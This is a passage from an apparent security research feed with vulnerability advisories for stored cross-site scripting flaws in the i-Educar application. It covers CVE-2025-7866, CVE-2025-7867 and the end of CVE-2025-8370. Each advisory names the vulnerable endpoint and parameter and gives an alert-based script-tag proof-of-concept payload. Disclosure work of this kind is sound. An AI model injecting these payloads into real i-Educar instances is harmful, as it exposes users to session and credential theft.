&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;XSS-PoC&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8370/image.png&amp;#34;
	width=&amp;#34;877&amp;#34;
	height=&amp;#34;800&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8370/image_hu_5f218bc04c4efbce.png 480w, /p/cve-2025-8370/image_hu_61d9d458bc662e2e.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;109&amp;#34;
		data-flex-basis=&amp;#34;263px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8370.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8370.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 31 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-7866</title>
        <link>https://www.cvehunters.com/p/cve-2025-7866/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-7866/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-7866-cross-site-scripting-xss-stored-endpoint-educar_deficiencia_lstphp-parameter-cod_deficiencia&amp;#34;&amp;gt;CVE-2025-7866: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;educar_deficiencia_lst.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;cod_deficiencia&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7866&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7866&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;educar_deficiencia_lst.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;cod_deficiencia&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;educar_deficiencia_lst.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-7866-cross-site-scripting-xss-stored-endpoint-educar_deficiencia_lstphp-parameter-cod_deficiencia&amp;#34;&amp;gt;CVE-2025-7866: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;educar_deficiencia_lst.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;cod_deficiencia&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7866&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7866&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;educar_deficiencia_lst.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;cod_deficiencia&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;educar_deficiencia_lst.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;cod_deficiencia&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;cod_deficiencia&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;PoC VulDB i-Educar Pacxxx&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;  &amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7866/image.png&amp;#34;
	width=&amp;#34;1905&amp;#34;
	height=&amp;#34;1110&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7866/image_hu_646e3b277d6607bd.png 480w, /p/cve-2025-7866/image_hu_d58317a6e86cd50.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;171&amp;#34;
		data-flex-basis=&amp;#34;411px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7866/image-1.png&amp;#34;
	width=&amp;#34;1859&amp;#34;
	height=&amp;#34;1070&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7866/image-1_hu_88404b61f892a24.png 480w, /p/cve-2025-7866/image-1_hu_8ce0f4ae80111656.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;173&amp;#34;
		data-flex-basis=&amp;#34;416px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;video-poc&amp;#34;&amp;gt;Video PoC:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://youtu.be/2N25n832O88&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://youtu.be/2N25n832O88&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7866.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7866.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/raul50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Raul Pazemécxas&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 20 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-7867</title>
        <link>https://www.cvehunters.com/p/cve-2025-7867/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-7867/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-7867-cross-site-scripting-xss-stored-endpoint-agendaphp-parameter-agenda_rap_titulo&amp;#34;&amp;gt;CVE-2025-7867: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;agenda.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;agenda_rap_titulo&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7867&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7867&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;agenda.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;agenda_rap_titulo&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;agenda.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-7867-cross-site-scripting-xss-stored-endpoint-agendaphp-parameter-agenda_rap_titulo&amp;#34;&amp;gt;CVE-2025-7867: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;agenda.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;agenda_rap_titulo&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7867&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7867&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;agenda.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;agenda_rap_titulo&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;agenda.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;agenda_rap_titulo&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;agenda_rap_titulo&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;PoC VulDB i-Educar PaCXXX&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;  &amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7867/image.png&amp;#34;
	width=&amp;#34;1901&amp;#34;
	height=&amp;#34;986&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7867/image_hu_9177192a4933535d.png 480w, /p/cve-2025-7867/image_hu_1214bd40f85ed40c.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;192&amp;#34;
		data-flex-basis=&amp;#34;462px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7867/image-1.png&amp;#34;
	width=&amp;#34;1896&amp;#34;
	height=&amp;#34;898&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7867/image-1_hu_bad03e95b8b5cbe1.png 480w, /p/cve-2025-7867/image-1_hu_639a842d81b9b092.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;211&amp;#34;
		data-flex-basis=&amp;#34;506px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;video-poc&amp;#34;&amp;gt;Video PoC:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://youtu.be/dOwcn_k2iTE&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://youtu.be/dOwcn_k2iTE&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7867.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
